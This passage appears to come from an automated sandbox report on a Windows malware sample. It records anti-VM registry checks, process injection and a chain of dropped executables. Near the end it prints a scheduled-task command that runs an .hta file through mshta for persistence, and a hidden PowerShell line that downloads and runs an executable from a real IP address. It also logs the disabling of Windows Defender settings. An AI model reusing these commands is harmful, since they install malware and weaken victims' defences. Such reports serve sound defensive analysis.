behavioral2/memory/4888-829-0x00007FFD189B0000-0x00007FFD18A37000-memory.dmp upx behavioral2/memory/4888-828-0x00007FFD18A40000-0x00007FFD18B0F000-memory.dmp upx behavioral2/memory/4888-841-0x00007FFD18B10000-0x00007FFD18BDD000-memory.dmp upx behavioral2/memory/4888-839-0x00007FFD23020000-0x00007FFD23044000-memory.dmp upx behavioral2/memory/4888-844-0x00007FFD18640000-0x00007FFD18889000-memory.dmp upx behavioral2/memory/4888-843-0x00007FFD18BE0000-0x00007FFD19100000-memory.dmp upx behavioral2/memory/4888-838-0x00007FFD281A0000-0x00007FFD281D3000-memory.dmp upx behavioral2/memory/4888-872-0x00007FFD2A740000-0x00007FFD2A759000-memory.dmp upx behavioral2/memory/4888-885-0x00007FFD28170000-0x00007FFD28196000-memory.dmp upx behavioral2/memory/4888-893-0x00007FFD1F750000-0x00007FFD1F77B000-memory.dmp upx behavioral2/memory/4888-892-0x00007FFD18580000-0x00007FFD1863C000-memory.dmp upx behavioral2/memory/4888-891-0x00007FFD228E0000-0x00007FFD2290E000-memory.dmp upx behavioral2/memory/4888-890-0x00007FFD18640000-0x00007FFD18889000-memory.dmp upx behavioral2/memory/4888-889-0x00007FFD23020000-0x00007FFD23044000-memory.dmp upx behavioral2/memory/4888-888-0x00007FFD28B60000-0x00007FFD28B72000-memory.dmp upx behavioral2/memory/4888-887-0x00007FFD21A80000-0x00007FFD21AC3000-memory.dmp upx behavioral2/memory/4888-886-0x00007FFD18890000-0x00007FFD189AC000-memory.dmp upx behavioral2/memory/4888-884-0x00007FFD2A650000-0x00007FFD2A65B000-memory.dmp upx behavioral2/memory/4888-883-0x00007FFD28F70000-0x00007FFD28F84000-memory.dmp upx behavioral2/memory/4888-882-0x00007FFD189B0000-0x00007FFD18A37000-memory.dmp upx behavioral2/memory/4888-881-0x00007FFD18A40000-0x00007FFD18B0F000-memory.dmp upx behavioral2/memory/4888-880-0x00007FFD18BE0000-0x00007FFD19100000-memory.dmp upx behavioral2/memory/4888-879-0x00007FFD18B10000-0x00007FFD18BDD000-memory.dmp upx behavioral2/memory/4888-877-0x00007FFD2D360000-0x00007FFD2D36D000-memory.dmp upx behavioral2/memory/4888-876-0x00007FFD28F90000-0x00007FFD28FC6000-memory.dmp upx behavioral2/memory/4888-875-0x00007FFD28FD0000-0x00007FFD28FFD000-memory.dmp upx behavioral2/memory/4888-874-0x00007FFD2A410000-0x00007FFD2A429000-memory.dmp upx behavioral2/memory/4888-873-0x00007FFD2D490000-0x00007FFD2D49D000-memory.dmp upx behavioral2/memory/4888-871-0x00007FFD2D4A0000-0x00007FFD2D4AF000-memory.dmp upx behavioral2/memory/4888-870-0x00007FFD2D3B0000-0x00007FFD2D3D3000-memory.dmp upx behavioral2/memory/4888-869-0x00007FFD19100000-0x00007FFD196E9000-memory.dmp upx -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job random.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\ubhq.job kdMujZh.exe File opened for modification C:\Windows\Tasks\ubhq.job kdMujZh.exe File created C:\Windows\Tasks\onrlju.job kdMujZh.exe File opened for modification C:\Windows\Tasks\onrlju.job kdMujZh.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023bff-673.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 2364 4312 WerFault.exe 91 3668 1360 WerFault.exe 135 4460 1428 WerFault.exe 142 2500 4596 WerFault.exe 147 980 4340 WerFault.exe 155 3856 4408 WerFault.exe 160 5656 3668 WerFault.exe 211 5880 6056 WerFault.exe 230 1552 6032 WerFault.exe 238 6068 4980 WerFault.exe 243 4164 3088 WerFault.exe 260 5436 3476 WerFault.exe 138 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oKUl4yo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76bdce9416.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 05bc0d252e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e1c4702da7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f44de5325.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c550466aee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7522e4c07b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ubhq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0ffe1f7c77.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbbfd3884e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4ddd11db3b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oKUl4yo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f68b49190.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ca656b8af.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e14272126a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4519c4ed8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4ddd11db3b.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8ca656b8af.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8ca656b8af.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4ddd11db3b.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e14272126a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e14272126a.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2744 timeout.exe -
Enumerates system info in registry 2 TTPs 14 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844807453449908" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5868 schtasks.exe 5232 schtasks.exe 4888 schtasks.exe 4476 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3628 random.exe 3628 random.exe 1152 skotes.exe 1152 skotes.exe 3660 skotes.exe 3660 skotes.exe 1528 f3Ypd8O.exe 1528 f3Ypd8O.exe 1528 f3Ypd8O.exe 1528 f3Ypd8O.exe 4724 kdMujZh.exe 4724 kdMujZh.exe 3468 powershell.exe 3468 powershell.exe 3136 powershell.exe 3136 powershell.exe 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE 3284 powershell.exe 3284 powershell.exe 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE 1248 powershell.exe 1248 powershell.exe 4724 kdMujZh.exe 4724 kdMujZh.exe 3296 powershell.exe 3296 powershell.exe 3488 ubhq.exe 3488 ubhq.exe 5008 0f68b49190.exe 5008 0f68b49190.exe 4280 483d2fa8a0d53818306efeb32d3.exe 4280 483d2fa8a0d53818306efeb32d3.exe 1360 4ddd11db3b.exe 1360 4ddd11db3b.exe 1360 4ddd11db3b.exe 1360 4ddd11db3b.exe 5008 0f68b49190.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 5008 0f68b49190.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 3476 8ca656b8af.exe 2396 05bc0d252e.exe 2396 05bc0d252e.exe 2396 05bc0d252e.exe 2396 05bc0d252e.exe 2396 05bc0d252e.exe 2396 05bc0d252e.exe 4364 con12312211221.exe 4364 con12312211221.exe 4364 con12312211221.exe 4364 con12312211221.exe 5064 c550466aee.exe 5064 c550466aee.exe 5064 c550466aee.exe 5064 c550466aee.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 5264 chrome.exe 5264 chrome.exe 5264 chrome.exe 1420 chrome.exe 1420 chrome.exe 1420 chrome.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeDebugPrivilege 5008 0f68b49190.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeShutdownPrivilege 4864 chrome.exe Token: SeCreatePagefilePrivilege 4864 chrome.exe Token: SeDebugPrivilege 5856 powershell.exe Token: SeDebugPrivilege 5148 powershell.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeDebugPrivilege 5884 powershell.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 5264 chrome.exe Token: SeCreatePagefilePrivilege 5264 chrome.exe Token: SeShutdownPrivilege 1420 chrome.exe Token: SeCreatePagefilePrivilege 1420 chrome.exe Token: SeShutdownPrivilege 1420 chrome.exe Token: SeCreatePagefilePrivilege 1420 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1148 7522e4c07b.exe 1148 7522e4c07b.exe 1148 7522e4c07b.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 4864 chrome.exe 5644 e1c4702da7.exe 5644 e1c4702da7.exe 5644 e1c4702da7.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 6112 msedge.exe 5264 chrome.exe 5264 chrome.exe 5264 chrome.exe 5264 chrome.exe 5264 chrome.exe 5264 chrome.exe 5264 chrome.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1148 7522e4c07b.exe 1148 7522e4c07b.exe 1148 7522e4c07b.exe 5644 e1c4702da7.exe 5644 e1c4702da7.exe 5644 e1c4702da7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3628 wrote to memory of 1152 3628 random.exe 89 PID 3628 wrote to memory of 1152 3628 random.exe 89 PID 3628 wrote to memory of 1152 3628 random.exe 89 PID 1152 wrote to memory of 4312 1152 skotes.exe 91 PID 1152 wrote to memory of 4312 1152 skotes.exe 91 PID 1152 wrote to memory of 4312 1152 skotes.exe 91 PID 4312 wrote to memory of 4212 4312 f3Ypd8O.exe 92 PID 4312 wrote to memory of 4212 4312 f3Ypd8O.exe 92 PID 4312 wrote to memory of 4212 4312 f3Ypd8O.exe 92 PID 4312 wrote to memory of 4848 4312 f3Ypd8O.exe 93 PID 4312 wrote to memory of 4848 4312 f3Ypd8O.exe 93 PID 4312 wrote to memory of 4848 4312 f3Ypd8O.exe 93 PID 4312 wrote to memory of 3236 4312 f3Ypd8O.exe 94 PID 4312 wrote to memory of 3236 4312 f3Ypd8O.exe 94 PID 4312 wrote to memory of 3236 4312 f3Ypd8O.exe 94 PID 4312 wrote to memory of 3696 4312 f3Ypd8O.exe 95 PID 4312 wrote to memory of 3696 4312 f3Ypd8O.exe 95 PID 4312 wrote to memory of 3696 4312 f3Ypd8O.exe 95 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 4312 wrote to memory of 1528 4312 f3Ypd8O.exe 96 PID 1152 wrote to memory of 2324 1152 skotes.exe 101 PID 1152 wrote to memory of 2324 1152 skotes.exe 101 PID 1152 wrote to memory of 2324 1152 skotes.exe 101 PID 1152 wrote to memory of 4724 1152 skotes.exe 102 PID 1152 wrote to memory of 4724 1152 skotes.exe 102 PID 1152 wrote to memory of 4724 1152 skotes.exe 102 PID 1152 wrote to memory of 1148 1152 skotes.exe 103 PID 1152 wrote to memory of 1148 1152 skotes.exe 103 PID 1152 wrote to memory of 1148 1152 skotes.exe 103 PID 1148 wrote to memory of 1424 1148 7522e4c07b.exe 104 PID 1148 wrote to memory of 1424 1148 7522e4c07b.exe 104 PID 1148 wrote to memory of 1424 1148 7522e4c07b.exe 104 PID 1148 wrote to memory of 60 1148 7522e4c07b.exe 105 PID 1148 wrote to memory of 60 1148 7522e4c07b.exe 105 PID 1148 wrote to memory of 60 1148 7522e4c07b.exe 105 PID 1424 wrote to memory of 4888 1424 cmd.exe 107 PID 1424 wrote to memory of 4888 1424 cmd.exe 107 PID 1424 wrote to memory of 4888 1424 cmd.exe 107 PID 60 wrote to memory of 3468 60 mshta.exe 108 PID 60 wrote to memory of 3468 60 mshta.exe 108 PID 60 wrote to memory of 3468 60 mshta.exe 108 PID 1152 wrote to memory of 3908 1152 skotes.exe 110 PID 1152 wrote to memory of 3908 1152 skotes.exe 110 PID 1152 wrote to memory of 3908 1152 skotes.exe 110 PID 3908 wrote to memory of 1296 3908 cmd.exe 112 PID 3908 wrote to memory of 1296 3908 cmd.exe 112 PID 3908 wrote to memory of 1296 3908 cmd.exe 112 PID 1296 wrote to memory of 2744 1296 cmd.exe 114 PID 1296 wrote to memory of 2744 1296 cmd.exe 114 PID 1296 wrote to memory of 2744 1296 cmd.exe 114 PID 1296 wrote to memory of 2036 1296 cmd.exe 115 PID 1296 wrote to memory of 2036 1296 cmd.exe 115 PID 1296 wrote to memory of 2036 1296 cmd.exe 115 PID 2036 wrote to memory of 3136 2036 cmd.exe 117 PID 2036 wrote to memory of 3136 2036 cmd.exe 117 PID 2036 wrote to memory of 3136 2036 cmd.exe 117 PID 3468 wrote to memory of 5104 3468 powershell.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
PID:4212
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 8324⤵
- Program crash
PID:2364
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088140001\oKUl4yo.exe"C:\Users\Admin\AppData\Local\Temp\1088140001\oKUl4yo.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\1088255101\7522e4c07b.exe"C:\Users\Admin\AppData\Local\Temp\1088255101\7522e4c07b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TegdbmaDHSh /tr "mshta C:\Users\Admin\AppData\Local\Temp\6YWWkm6aD.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TegdbmaDHSh /tr "mshta C:\Users\Admin\AppData\Local\Temp\6YWWkm6aD.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4888
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\6YWWkm6aD.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Users\Admin\AppData\Local\TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE"C:\Users\Admin\AppData\Local\TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
